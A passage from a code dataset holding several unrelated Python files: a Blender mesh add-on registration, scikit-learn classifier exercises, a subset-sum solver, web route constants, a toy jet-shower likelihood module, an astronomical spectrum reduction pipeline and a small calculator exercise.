operador\"],\n\t[MoverVerticesOperatorPanel, \"panel de mover vertices\"],\n\t\n\t[JoinExploteOperator, \"explota caras operador\"],\n\t[JoinExploteOperatorPanel, \"Une separa caras\"],\n\t\n\t[LengthSet, \"largo borde\"],\n\t[AngleSet, \"angulo borde\"],\n\t[MontanaOperator, \"linea montaña\"],\n\t[delMontanaOperator, \"borrar montaña\"],\n\t[delCreaseOperator, \"linea crease\"],\n\t[CreaseOperator, \"borrar linea crease\"],\n\n\t[HideShowOperator, \"ocultar mostrar inverso operador\"],\n\t[HideShowOperatorPanel, \"ocultar mostrar inverso panel\"],\n\t\n [angleBisectorOperator, \"divide angulo en partes iguales\"],\n\t[angleBisectorOperatorPanel, \"dibuja panel para equally_angle\"],\n#\t[DegreeBisectorOperator, \"divide la malla en un angulo indicado\"],\n#\t[DegreeBisectorOperatorPanel, \"dibuja panel para DegreeBisectorOperator\"],\n\t[PerpendicularBisectorOperator, \"divide la malla en un angulos de 90 desde los vertices\"],\n\t[PerpendicularBisectorOperatorPanel, \"divide la malla en un angulo indicado\"],\n\t[PerpendicularOrthoOperator, \"Dibuja las lineas a 90 grados para formar Orthocentros\"],\n\t[PerpendicularOrthoOperatorPanel, \"Dibuje el panel de Ortocentro\"],\n\t[PerpendicularCircumOperator, \"Dibuja las lineas a 90 grados para formar circumcentros\"],\n\t[PerpendicularCircumOperatorPanel, \"Dibuja el panel de Circumcentro\"],\n\t[JoinBisectorOperator, \"Une dos vertices y divide la malla\"],\n\t[JoinBisectorOperatorPanel, \"Del panel de Join\"],\n\t[TriangleBisectorOperator, \"Triangle bisector\"],\n\t[TriangleBisectorOperatorPanel, \"Dibuja el panel del trianglebisector\"],\n\t[Edge_Equalizer_LengthOperator, \"edge equalizer operator\"],\n\t[Edge_Equalizer_LengthOperatorPanel, \"Edge Equalizer panel\"]\n\n)\n\n\ndef menu_func(self, context):\n for i, text in doshape_classes:\n self.layout.operator(i.bl_idname, text=text)\n\ndef register():\n \n\ttry:\n\t\tfor i, _ in doshape_classes:\n \n\t\t\ttry:\n\t\t\t\tbpy.utils.register_class(i)\n\t\t\texcept:\n\t\t\t\tprint(\"error al registrar: \" + str(i))\n\texcept:\n\t\tprint(\"imposible registrar modulos\")\n\ndef unregister():\n \n\ttry:\n\t\tfor i, _ in doshape_classes:\n \n\t\t\ttry:\n\t\t\t\tbpy.utils.unregister_class(i)\n\t\t\texcept:\n\t\t\t\tprint(\"error al desregistrar: \" + str(i))\n\texcept:\n\t\tprint(\"imposible esregistrar modulos\")\n \nif __name__ == \"__main__\":\n\tregister()\n\t\n","sub_path":"scripts/addons_extern/mesh_doshape_tools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455029780","text":"#Fitting multi-class logistic regression#\r\n\r\n#In this exercise, you'll fit the two types of multi-class logistic regression, one-vs-rest and softmax/multinomial, on the handwritten digits data set and compare the results. 
The handwritten digits dataset is already loaded and split into X_train, y_train, X_test, and y_test.\r\n\r\n# Fit one-vs-rest logistic regression classifier\r\nlr_ovr = LogisticRegression()\r\nlr_ovr.fit(X_train, y_train)\r\n\r\nprint(\"OVR training accuracy:\", lr_ovr.score(X_train, y_train))\r\nprint(\"OVR test accuracy :\", lr_ovr.score(X_test, y_test))\r\n\r\n# Fit softmax classifier\r\nlr_mn = LogisticRegression(multi_class=\"multinomial\", solver=\"lbfgs\")\r\nlr_mn.fit(X_train, y_train)\r\n\r\nprint(\"Softmax training accuracy:\", lr_mn.score(X_train, y_train))\r\nprint(\"Softmax test accuracy :\", lr_mn.score(X_test, y_test))\r\n\r\n\r\n# Print training accuracies\r\nprint(\"Softmax training accuracy:\", lr_mn.score(X_train, y_train))\r\nprint(\"One-vs-rest training accuracy:\", lr_ovr.score(X_train, y_train))\r\n\r\n# Create the binary classifier (class 1 vs. rest)\r\nlr_class_1 = LogisticRegression(C = 100)\r\nlr_class_1.fit(X_train, y_train==1)\r\n\r\n# Plot the binary classifier (class 1 vs. rest)\r\nplot_classifier(X_train, y_train==1, lr_class_1)\r\n\r\n\r\n\r\n#One-vs-rest SVM#\r\n\r\n#As motivation for the next and final chapter on support vector machines, we'll repeat the previous exercise with a non-linear SVM. Once again, the data is loaded into X_train, y_train, X_test, and y_test .#\r\n\r\n#Instead of using LinearSVC, we'll now use scikit-learn's SVC object, which is a non-linear \"kernel\" SVM (much more on what this means in Chapter 4!). Again, your task is to create a plot of the binary classifier for class 1 vs. rest.\r\n\r\n# We'll use SVC instead of LinearSVC from now on\r\nfrom sklearn.svm import SVC\r\n\r\n# Create/plot the binary classifier (class 1 vs. 
rest)\r\nsvm_class_1 = SVC()\r\nsvm_class_1.fit(X_train, y_train==1)\r\nplot_classifier(X_train, y_train==1,clf = svm_class_1)","sub_path":"python_career_machine_learning_scientist/03_linear_classifiers_in_python/Logistic_regression/03_multiclass_regression.py","file_name":"03_multiclass_regression.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460636809","text":"from random import randint, sample\r\nfrom itertools import chain, combinations\r\nimport time\r\nimport sys\r\n\r\nclass SSP():\r\n def __init__(self, S=[27,2,16,14], t=30, worst=0, best=100):\r\n self.S = S\r\n self.t = t\r\n self.n = len(S)\r\n self.best = best\r\n self.worst = worst\r\n self.TotalTime = 0\r\n self.myMax = []\r\n #\r\n self.decision = False\r\n self.total = 0\r\n self.selected = []\r\n\r\n def __repr__(self):\r\n return \"SSP instance: S=\"+str(self.S)+\"\\tt=\"+str(self.t)\r\n \r\n def random_instance(self, n, bitlength=10):\r\n max_n_bit_number = 2**bitlength-1\r\n self.S = sorted( [ randint(0,max_n_bit_number) for i in range(n) ] , reverse=True)\r\n self.t = randint(0,n*max_n_bit_number)\r\n self.n = len( self.S )\r\n\r\n def random_yes_instance(self, n, bitlength):\r\n max_n_bit_number = 2**bitlength-1\r\n self.S = sorted( [ randint(0,max_n_bit_number) for i in range(n) ] , reverse=True)\r\n self.t = sum( sample(self.S, randint(0,n)) )\r\n self.n = len( self.S )\r\n\r\n ###\r\n\r\n def try_at_random(self):\r\n candidate = []\r\n total = 0\r\n startTime = time.time()\r\n while total != self.t:\r\n candidate = sample(self.S, randint(0,self.n))\r\n total = sum(candidate)\r\n ## print( \"Trying: \", candidate, \", sum:\", total )\r\n endTime = time.time()\r\n TimeTaken = endTime - startTime\r\n print(TimeTaken)\r\n\r\n\r\n def resetvars(self):\r\n self.best = sys.maxsize\r\n self.worst = 0.0\r\n self.TotalTime = 0.0\r\n self.myMax = []\r\n\r\n def exhaustive_search(self):\r\n \r\n # t0 = time.clock()\r\n StartTime = time.time()\r\n for subset in chain.from_iterable(combinations(self.S, r) for r in range(len(self.S)+1)):\r\n ##print (\"Subset didnt match \",subset)\r\n \r\n if sum(subset)==self.t:\r\n ##print(\"\", end ='')\r\n EndTime = time.time()\r\n TimeTaken = EndTime - StartTime\r\n ##print(TimeTaken,self.t,subset)\r\n self.TotalTime += TimeTaken\r\n\r\n if self.worst < TimeTaken:\r\n self.worst = TimeTaken\r\n \r\n if self.best > TimeTaken:\r\n self.best = TimeTaken\r\n ##print(subset,self.t,self.best)\r\n return self.best,self.worst,self.TotalTime\r\n ##print(\"Subset did match \", subset)\r\n # print(time.clock() - t0, \"seconds\")\r\n \r\n def Dynamic_Programming(self):\r\n StartTime = time.time()\r\n subset = [[ False for x in range(self.n+1)] for y in range(self.t+1)] \r\n i = 0\r\n for i in range(self.n):\r\n \r\n subset[0][i] = True\r\n ##print(i,subset[0][i])\r\n \r\n for i in range(1,self.t):\r\n \r\n subset[i][0] = False\r\n\r\n\r\n for i in range(1,self.t+1):\r\n \r\n for j in range(1,self.n+1):\r\n \r\n subset[i][j] = subset[i][j-1]\r\n \r\n if (i >= self.S[j-1]):\r\n ##print(\"before\",subset[i+1][j+1])\r\n subset[i][j] = subset[i][j] or subset[i-self.S[j-1]][j-1]\r\n ##print(\"after\",subset[i+1][j+1])\r\n \r\n \r\n## for i in range(self.t+1):\r\n## j=0\r\n## print (\"reulting grid1\",i,j,subset[i][j])\r\n## \r\n## \r\n## for j in range(self.n+1):\r\n## \r\n## print (\"reulting grid2\",i,j,subset[i][j])\r\n \r\n ##print(self.t,self.n,subset[self.t][self.n])\r\n ##return 
subset[self.t][self.n]\r\n EndTime = time.time()\r\n TimeTaken = EndTime - StartTime\r\n ##print(TimeTaken,self.t,subset)\r\n self.TotalTime += TimeTaken\r\n return self.best,self.worst,self.TotalTime\r\n\r\n def HighestNumber(self,total):\r\n maxSoFar = 0\r\n \r\n for num in self.S:\r\n if maxSoFar < num and (num + total) <= self.t and num not in self.myMax:\r\n maxSoFar = num\r\n if maxSoFar != 0:\r\n self.myMax.extend([maxSoFar])\r\n print(\"This is myMax\",self.myMax)\r\n \r\n \r\n def Greedy(self):\r\n i = 0\r\n total = 0\r\n subset = []\r\n while [x for x in self.S if x not in subset]:\r\n if i == 0:\r\n instance.HighestNumber(total)\r\n \r\n print(self.S[i],total)\r\n if (total +self.S[i] <= self.t and self.S[i] in self.myMax):\r\n subset.extend([self.S[i]])\r\n total += self.S[i]\r\n i = -1\r\n i+=1\r\n print(subset, \" \" ,i)\r\n if self.n <= i:\r\n self.myMax = []\r\n print(\"Found the solution and it is \", (self.t - total))\r\n return subset, self.t - total\r\n def f(self,s):\r\n return self.t - sum(s)\r\n\r\n def Iterative_Improvement(self, s):\r\n i=0\r\n s2 = [ s[x] for x in range(len(s))]\r\n print(len(s2))\r\n print(\"This is s2 \", s2, \"This is s \",s)\r\n while sum(s) != self.t or i != self.S:\r\n for num in self.S:\r\n print(num,\" \", s)\r\n if num not in s:\r\n print (len(s2),i)\r\n if len(s2) <= i:\r\n return \"most optimum solution possible for this search\",s,\" \",s2\r\n s2[i] = num\r\n i+=1\r\n \r\n print(instance.f(s2),\" \",instance.f(s))\r\n if instance.f(s2) < instance.f(s) and instance.f(s2) >= 0:\r\n print(\"Found a better solution\")\r\n s = s2\r\n print(\"Solution \",s)\r\n #replace s with better solution\r\n #return s\r\ncount = 0 \r\nq = 0 \r\n \r\n\r\ninstance = SSP()\r\ntime.clock()\r\nbest_candidate,result = instance.Greedy()\r\nprint(instance.Iterative_Improvement(best_candidate))\r\nfor n in range(25,40): # start the search with 5 elements in array, stop when there are 29 elements\r\n instance.resetvars()\r\n q += 1\r\n \r\n# start the clock\r\n for i in range(40): # After 5 iterations the loop ends. Loop starts again when new element is added to the array.\r\n pass\r\n ##instance.random_yes_instance(n,10)\r\n ##result = instance.Greedy()\r\n ##print( instance )\r\n \r\n ##bestcase, worstcase , TotalTime = instance.exhaustive_search()\r\n ##instance.Dynamic_Programming()\r\n ##instance.try_at_random()\r\n ##bestcase, worstcase, TotalTime = instance.Dynamic_Programming()\r\n ##if n == 30:\r\n ##print(\"Stop now\",time.clock())\r\n \r\n ##print(time.clock(), \"seconds LAST\") # I was testing here, I think this prints the total time it took for all 5 searches \r\n\r\n ##print((TotalTime/40)*10) # Because the search is run amongst arrays of the same size 5 times, before incrementing the array size by 1, the avg would be the total clock time divided by 5. 
(Again just testing here)\r\n ##print(worstcase*10)\r\n ##print(bestcase*10)\r\n##print(best_candidate)\r\n","sub_path":"SSP Problem version 4.py","file_name":"SSP Problem version 4.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"51910250","text":"# System URLs\nrequestWarmUp = '/_ah/warmup'\n\nrequestTest = '/test'\nrequestUserSignUpTrack = '/track'\nrequestGetParcelStatus = '/get-parcel-status'\nrequestTwitterCallback = '/twitter/oauth-callback'\n\ntwitterSendMessage = '/twitter/send-message'\n\nfirebaseNotification = '/firebase/notification'\n\ncronCheckParcelStatuses = '/work/check-parcel-statuses'\ntaskGetParcelStatus = '/work/get-parcel-status'\ntaskNotificationSMS = '/work/notification-sms'\ntaskNotificationIFTTTEmail = '/work/notification-ifttt'\n\n# Admin\nadminSendUpdate = '/send/update'","sub_path":"controllers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622046898","text":"#### Manual extraction pipeline. Extracts arc, identifies lines, extracts spectrum for multiple file and wavelength calibrates. \n#### Flux calibrates to sensitivity function, then corrects to spectrostandard. \n#### Automatically removes previous extraction files when extract_spectra = 'y'\n\nfrom pyraf import iraf\nimport os\nimport glob\nimport numpy as np\nfrom astropy.io import fits\n\n############################\nz = 0.0\nextract_arc = 'y'\nextract_spectra = 'y'\nflux_calibrate = 'y'\napply_flux_correction = 'y'\nplotgal = 'y'\nplotvel = 'n'\nvelocity = 15500\nE = 1e-5\n############################\n\n####### Define function\ndef dop(lamr,vel):\n vel=vel*-1\n a = (1.+vel/3.e5)**0.5\n b=(1.-vel/3.e5)**0.5\n return lamr*a/b\n\ndef dered(wav,flux,Rv,Ebv):\n lam=wav*0.0001\n Av=Ebv*Rv\n x=1/lam\n y=x-1.82\n a=1+(0.17699*y)-(0.50477*y**2)-(0.02427*y**3)+(0.72085*y**4)+(0.01979*y**5)-(0.77530*y**6)+(0.32999*y**7)\n b=(1.41338*y)+(2.28305*y**2)+(1.07233*y**3)-(5.38434*y**4)-(0.62251*y**5)+(5.30260*y**6)-(2.09002*y**7)\n AlAv=a+b/Rv\n Al=AlAv*Av\n #print Al\n F=10**(Al/2.5)\n delF= flux*F\n return delF\n \ndef isarc(fits_file):\n hdul = fits.open(fits_file)\n hdr = hdul[0].header\n if 'OBSTYPE' in hdr:\n if hdr['OBSTYPE']=='ARC':\n return True\n else:\n return False \ndef name(fits_file):\n hdul = fits.open(fits_file)\n hdr = hdul[0].header\n if 'OBJECT' in hdr:\n return hdr['OBJECT']\n \n else:\n print ('No defined object name in fits header -- please provide an object name\\n') \n return raw_input('Object name: ')\n \n### misc definitions\nspectrafilelist='@speclist'\nsensfile='newsen'\nhthresh2=90000\n\n\n### make a list of the files\n## create the speclist but importing all fits files in folder but rejecting the sensfunc file, arc, and previous extraction files\nfile_list = glob.glob('./*.fits');file_list.sort()\n\n\n### find arcfile\nfor f in file_list:\n if isarc(f) == True:\n arcfile = f\n \n### find object file \nfinal=[]\nfor j in range(len(file_list)):\n if sensfile not in file_list[j]:\n if arcfile not in file_list[j]:\n if '.ms.fits' not in file_list[j]:\n if '.w.fits' not in file_list[j]: \n final.append(file_list[j])\n \n### Define the object name\nobj = name(final[0])\n \n \n### Save the list of spectra \nnp.savetxt('./speclist',final,fmt=\"%s\")\n\n### apall on arc\niraf.twodspec()\niraf.apextract(dispaxis=1)\n\nif extract_arc !='n':\n print('\\n'+'Extracting arc 
file')\n iraf.apall(input=arcfile, output='arc.ms',apertur=1,interac='yes',find='yes',nfind=1,recente='yes',resize='yes',background='none')\n\n ## identify lines\n print('\\n'+'Identify arc lines')\n iraf.identify(images='arc.ms',coordlist='Xe.txt', function='spline3',order=3,maxfeatures=10)\n\nif extract_spectra !='n':\n \n ### apall on spectrum\n for n in final:\n \n ### Remove previous extractions\n if os.path.exists(n+'.ms.fits')==True:\n print('Removing',n+'.ms.fits')\n os.remove(n+'.ms.fits')\n if os.path.exists(n+'.w.fits')==True:\n print('Removing',n+'.w.fits')\n os.remove(n+'.w.fits')\n \n ### Commence extraction\n print('\\n'+'Spectrum file = '+n+'[0]')\n print('\\n'+'Extracting Spectra...')\n iraf.apall(input=n+'[0][0]', output=n+'.ms',apertur=1,interac='yes',find='yes',nfind=1,recente='yes',resize='yes',background='fit')\n \n print('\\n'+'Editing the header to point to the wavelength calibration...')\n iraf.hedit(images=n+'.ms', addonly='yes',fields='REFSPEC1', value='arc.ms')\n \n print('\\n'+'Applying the dispersion correction...')\n iraf.dispcor(input=n+'.ms',output=n+'.w')\n \n print('\\n'+'Wavelength calibrated spectrum output as '+ n+'.w.fits')\n \n\nprint('\\nBeginning flux calibration...')\n \n## create the speclist but importing all fits files in folder but rejecting the sensfunc file\nfile_list = glob.glob('./*.fits');file_list.sort()\nfinal=[]\nfor j in range(len(file_list)):\n if 'fits.w.fits' in file_list[j]: \n final.append(file_list[j])\n \nnp.savetxt('./speclist',final,fmt=\"%s\")\n\n## extract the date. file_list[3] is used because arc.fits, arc.ms.fits, and the sensfile take up the first three positions\ndate=''\nit=0\nfor j in range(len(file_list[3])):\n if file_list[3][j]=='_':\n it+=1\n if it == 2 and file_list[3][j]!='_':\n date = date+file_list[3][j]\nprint('Date = '+ date)\n\nif flux_calibrate != 'n': \n ## begin IRAFing\n \n print('\\n'+'Setting airmass...')\n iraf.setairmass('@speclist', observ='lapalma', ra='cat-ra', dec='cat-dec', equi='cat-equi', st='lst', ut='utstart') \n \n print('\\n'+'Combining spectra...') \n iraf.scombine(input='@speclist',output='allspec',group='all',combine='median', gain = 2.45, reject='crreject',lthresh=1e-30, hthresh=hthresh2)\n \n print('\\n'+'Applying flux calibration to sensitivity function...') \n iraf.calibrate('@speclist', 'allspeccal', obs='lapalma', sens=sensfile,extinct='no', ignoreaps='yes') ## If extinct='yes', try extinction ='onedstds$ctioextinct.dat'\n \n print('\\n'+'Extracting the 1D spectra from the calibrated multispec file...') \n iraf.scopy('allspeccal[0]', 'allspeccal2', format='onedspec', w1=4000,w2=8000, rebin='no')\n \n \n print('\\n'+'1D spectrum output...')\n iraf.wspectext('allspeccal2.0001', obj+'_'+date+'.txt',header='no')\n \n print('\\n'+'Tidying up...')\n a = glob.glob('./*')\n for f in a:\n if 'allspec' in f:\n os.remove(f)\n \nif apply_flux_correction != 'n':\n \n s = np.loadtxt('./ManualExtractionFluxCorrections.txt',unpack=True, usecols=(0,1))\n \n file_to_use = obj+'_'+date+'.txt'\n print('\\n'+'Using '+ file_to_use+' as reference...')\n a=np.loadtxt('./'+file_to_use,unpack=True)\n \n for q in range(len(a[0])):\n find = np.argmin(abs(s[0]-a[0][q]))\n a[1][q] = a[1][q]*s[1][find]\n\n \n print('\\n'+file_to_use + ' corrected to ManualExtractionFluxCorrections.txt')\n master = zip(a[0],a[1])\n\n ### Save the corrected spectrum\n np.savetxt('./'+file_to_use[:-4]+'.w.txt',master,fmt=\"%s\")\n \n ### Load the corrected spectrum\n n = 
np.loadtxt('./'+file_to_use[:-4]+'.w.txt',dtype='float',unpack=True)\n \n ### Plot the corrected and dereddened spectrum\n import matplotlib.pyplot as plt\n m = np.max(a[1])\n a[1] = dered(a[0],a[1],3.1,E)\n plt.plot(a[0]/(1.+z),a[1]/max(a[1]),color='k',linewidth=1,label=obj+'\\n$z='+str(z)+'$')\n \n ### if necessary plot the galaxy lines\n if plotgal != 'n':\n l = [6548,6583, 4959,5007,5890,6717,6731]\n for line in l:\n ys = np.linspace(0,1.)\n xs = [line for op in ys]\n plt.plot(xs,ys,color='grey',linestyle='dotted',zorder=0,linewidth=0.7)\n l = [6563,4861,4341,4100]\n for line in l:\n ys = np.linspace(0,1.)\n xs = [line for op in ys]\n plt.plot(xs,ys,color='red',linestyle='dashed',zorder=0,linewidth=0.7)\n \n if plotvel !='n':\n l = [6355]\n for line in l:\n ys = np.linspace(0,1.)\n xs = [dop(line,velocity) for op in ys]\n plt.plot(xs,ys,color='green',linestyle='dashed',zorder=0,linewidth=0.7)\n \n \n plt.legend()\n plt.ylim([0,1.1])\n plt.xlabel('Rest-frame wavelength [$\\AA$]')\n plt.ylabel('Scaled flux')\n plt.savefig('./'+obj+'.pdf',bbox_inches='tight')\n plt.close()\n \n \n ### Compare the two spectra\n a = np.loadtxt(file_to_use,unpack=True)\n plt.plot(a[0]/(1.+z),a[1]/max(a[1]),color='k',alpha=1,linewidth=1,label='Original')\n a = np.loadtxt(file_to_use[:-4]+'.w.txt',unpack=True)\n plt.plot(a[0]/(1.+z),a[1]/max(a[1]),color='red',alpha=0.7,linewidth=1,label='Corrected')\n plt.legend()\n plt.xlabel('Rest-frame wavelength [$\\AA$]')\n plt.ylabel('Scaled flux')\n plt.savefig('./'+obj+'_compare.pdf',bbox_inches='tight')\n plt.close()","sub_path":"SPRATManualExtraction.py","file_name":"SPRATManualExtraction.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"368528802","text":"# Curso em Vídeo Python 3 - Exercicio 59\n# Calculadora básica\n\nfrom time import sleep\nprint('{}CALCULADORA{}'.format('-'*6, '-'*6))\nnum1 = float(input('Primeiro valor: '))\nnum2 = float(input('Segundo valor: '))\nopc = 0\n\nwhile opc != 5:\n print('''OPERAÇÕES\n [ 1 ] SOMAR\n [ 2 ] MULTIPLICAR\n [ 3 ] MAIOR\n [ 4 ] NOVOS NUMEROS\n [ 5 ] SAIR''')\n opc = int(input('Opção: '))\n\n if opc == 1:\n soma = num1 + num2\n print('A soma dos numeros é: {}'.format(soma))\n elif opc == 2:\n mult = num1 * num2\n print('O produto dos numeros é: {}'.format(mult))\n elif opc == 3:\n if num1 > num2:\n print('O maior numero é: {}'.format(num1))\n elif num1 < num2:\n print('O maior numero é: {}'.format(num2))\n else:\n print('Os numeros são iguais: {}'.format(num1))\n elif opc == 4:\n num1 = float(input('Primeiro valor: '))\n num2 = float(input('Segundo valor: '))\n elif opc == 5:\n print('Fechando programa...')\n sleep(2)\n else:\n print('Opção inválida')\n print('-'*23)\n","sub_path":"Mundo 2/Exercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525816919","text":"import pickle\nimport numpy as np\nimport torch\n\n\ndef get_delta_LR(pL, pR):\n \"\"\"\n Calculate delta of an edge, given its child momenta\n \"\"\"\n return np.sqrt(np.sum((pR / 2 - pL / 2) ** 2))\n\n\ndef get_delta_PC(p, pC):\n \"\"\"\n Calculate delta of an edge, given its momentum and the momentum of a child\n \"\"\"\n return np.sqrt(np.sum((p / 2 - pC) ** 2))\n\n\n\n\n\n\n\n\n\n\ndef split_logLH(pL, delta_L, pR, delta_R, delta_min, lam):\n \"\"\"\n Takes two edges (p, delta) and\n return the splitting that generated them (p, 
delta_P, phi)\n with its log likelihood\n \"\"\"\n p = pR + pL\n delta_vec = (pR - pL) / 2\n phi = np.arctan2(delta_vec[0], delta_vec[1])\n delta_P = get_delta_LR(pL, pR)\n\n def get_p(delta_P, delta, delta_min, lam):\n if delta > 0:\n # r = delta / delta_P\n return np.log(lam) - np.log(delta_P) - lam * delta / delta_P\n else:\n # r = delta_min / delta_P\n return np.log(1 - np.exp(-lam * delta_min / delta_P))\n\n logLH = (\n get_p(delta_P, delta_L, delta_min, lam)\n + get_p(delta_P, delta_R, delta_min, lam)\n + np.log(1 / 2 / np.pi)\n )\n\n if delta_P < delta_min:\n logLH = - np.inf\n\n return logLH, p, delta_P, phi\n\n\n\n\ndef Basic_split_logLH(pL, delta_L, pR, delta_R, delta_min, lam):\n \"\"\"\n Takes two edges (p, delta) and\n return the splitting that generated them (p, delta_P, phi)\n with its log likelihood\n\n Note: Leaves in the Toy Generative Model are assigned Delta=0\n \"\"\"\n\n delta_P = get_delta_LR(pL, pR)\n\n # Get logLH\n def get_p(delta_P, delta, delta_min, lam):\n if delta > 0:\n # r = delta / delta_P\n return np.log(lam) - np.log(delta_P) - lam * delta / delta_P\n else:\n \"\"\" We set Delta=0 if the node is a leaf \"\"\"\n # r = delta_min / delta_P\n return np.log(1 - np.exp(-lam * delta_min / delta_P))\n\n if delta_P < delta_min:\n logLH = - np.inf\n\n else:\n\n logLH = (\n get_p(delta_P, delta_L, delta_min, lam)\n + get_p(delta_P, delta_R, delta_min, lam)\n + np.log(1 / 2 / np.pi)\n )\n\n return logLH\n\n\n\n\n\n\n\ndef fill_jet_info(jet, parent_id=None):\n \"\"\"\n Fill jet[\"deltas\"] amd jet[\"draws\"] given jet[\"tree\"] and jet[\"content\"]\n Assing r = None to the root and the leaves, and assign delta = 0 to the leaves\n \"\"\"\n deltas = []\n draws = []\n\n root_id = jet[\"root_id\"]\n\n _get_jet_info(jet, root_id=root_id, parent_id=parent_id, deltas=deltas, draws=draws)\n\n jet[\"deltas\"] = deltas\n jet[\"draws\"] = draws\n\n return jet\n\ndef _get_jet_info(jet, root_id=None, parent_id=None, deltas=None, draws=None):\n \"\"\"\n Recursion to fill jet[\"deltas\"] amd jet[\"draws\"]\n \"\"\"\n\n if jet[\"tree\"][root_id][0] != -1 and jet[\"tree\"][root_id][1] != -1:\n\n idL = jet[\"tree\"][root_id][0]\n idR = jet[\"tree\"][root_id][1]\n pL = jet[\"content\"][idL]\n pR = jet[\"content\"][idR]\n delta = get_delta_LR(pL, pR)\n if parent_id is not None:\n delta_parent = deltas[parent_id]\n r = torch.tensor(delta / delta_parent)\n else:\n r = None\n\n deltas.append(delta)\n draws.append(r)\n\n _get_jet_info(jet, root_id=idL, parent_id=root_id, deltas=deltas, draws=draws)\n _get_jet_info(jet, root_id=idR, parent_id=root_id, deltas=deltas, draws=draws)\n\n else:\n if jet[\"tree\"][root_id][0] * jet[\"tree\"][root_id][1] != 1:\n raise ValueError(f\"Invalid jet left and right child are not both -1\")\n else:\n deltas.append(0)\n draws.append(None)\n\n\ndef enrich_jet_logLH(jet, Lambda=None, delta_min=None, dij=False, alpha = None):\n \"\"\"\n Attach splitting log likelihood to each edge, by calling recursive\n _get_jet_likelihood.\n \"\"\"\n logLH = []\n dijList = []\n\n root_id = jet[\"root_id\"]\n\n if Lambda is None:\n Lambda = float(jet.get(\"Lambda\"))\n if Lambda is None:\n raise ValueError(f\"No Lambda specified by the jet.\")\n if delta_min is None:\n delta_min = jet.get(\"pt_cut\")\n if delta_min is None:\n raise ValueError(f\"No pt_cut specified by the jet.\")\n\n _get_jet_logLH(\n jet,\n root_id = root_id,\n Lambda = Lambda,\n delta_min = delta_min,\n logLH = logLH,\n dij = dij,\n dijList = dijList,\n alpha = alpha,\n )\n\n jet[\"logLH\"] = 
np.asarray(logLH)\n jet[\"dij\"] = dijList\n\n return jet\n\n\ndef _get_jet_logLH(\n jet,\n root_id = None,\n Lambda = None,\n delta_min = None,\n logLH = None,\n dij = False,\n dijList = None,\n alpha = None\n):\n \"\"\"\n Recursively enrich every edge from root_id downward with their log likelihood.\n log likelihood of a leaf is 0. Assumes a valid jet.\n \"\"\"\n if jet[\"tree\"][root_id][0] != -1:\n\n\n idL = jet[\"tree\"][root_id][0]\n idR = jet[\"tree\"][root_id][1]\n pL = jet[\"content\"][idL]\n pR = jet[\"content\"][idR]\n delta_L = jet[\"deltas\"][idL]\n delta_R = jet[\"deltas\"][idR]\n\n # print(delta_L, delta_R, Lambda)\n # print(\"---\"*5)\n # p_P =jet[\"content\"][root_id]\n\n\n # if jet[\"tree\"][idL][0] !=-1:\n #\n # delta_L = get_delta_PC(pL, jet[\"content\"][jet[\"tree\"][idL][0]])\n #\n # if jet[\"tree\"][idR][0] != -1:\n # delta_R = get_delta_PC(pR, jet[\"content\"][jet[\"tree\"][idR][0]])\n\n\n #\n # print(delta_L, delta_R, Lambda)\n\n # jet[\"deltas\"][idL] = delta_L\n # jet[\"deltas\"][idR] = delta_R\n\n # print(idL, idR,pL,pR,delta_L,delta_R, delta_min, Lambda)\n\n \n\n # p_P =jet[\"content\"][root_id]\n # delta_L = get_delta_PC(p_P, pL)\n # delta_R = get_delta_PC(p_P, pR)\n # print(idL, idR,pL,pR,delta_L,delta_R, delta_min, Lambda)\n\n\n\n\n llh, _ , _ , _ = split_logLH(pL, delta_L, pR, delta_R, delta_min, Lambda)\n logLH.append(llh)\n # print('logLH = ', llh)\n\n if dij:\n\n \"\"\" dij=min(pTi^(2 alpha),pTj^(2 alpha)) * [arccos((pi.pj)/|pi|*|pj|)]^2 \"\"\"\n # epsilon = 1e-6 # For numerical stability\n dijs= [float(llh)]\n\n for alpha in [-1,0,1]:\n\n tempCos = np.dot(pL, pR) / (np.linalg.norm(pL) * np.linalg.norm(pR))\n if abs(tempCos) > 1: tempCos = np.sign(tempCos)\n\n dijVal = np.sort((np.abs([pL[0],pR[0]])) ** (2 * alpha))[0] * \\\n (\n np.arccos(tempCos)\n ) ** 2\n\n dijs.append(dijVal)\n\n dijList.append(dijs)\n\n\n _get_jet_logLH(\n jet,\n root_id = idL,\n Lambda = Lambda,\n delta_min = delta_min,\n logLH = logLH,\n dij = dij,\n dijList = dijList,\n alpha = alpha,\n )\n _get_jet_logLH(\n jet,\n root_id = idR,\n Lambda = Lambda,\n delta_min = delta_min,\n logLH = logLH,\n dij = dij,\n dijList = dijList,\n alpha = alpha,\n )\n\n else:\n\n logLH.append(0)\n\n\n","sub_path":"showerSim/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425589207","text":"import logging\nimport sys\nsys.path.append('../')\n\nfrom wieserlabsdds import WieserlabsClient\n\n\"\"\"\nThis example ramps the frequency of slot 0, channel 0 from 1MHz to 2MHz over the\nspan of one second. 
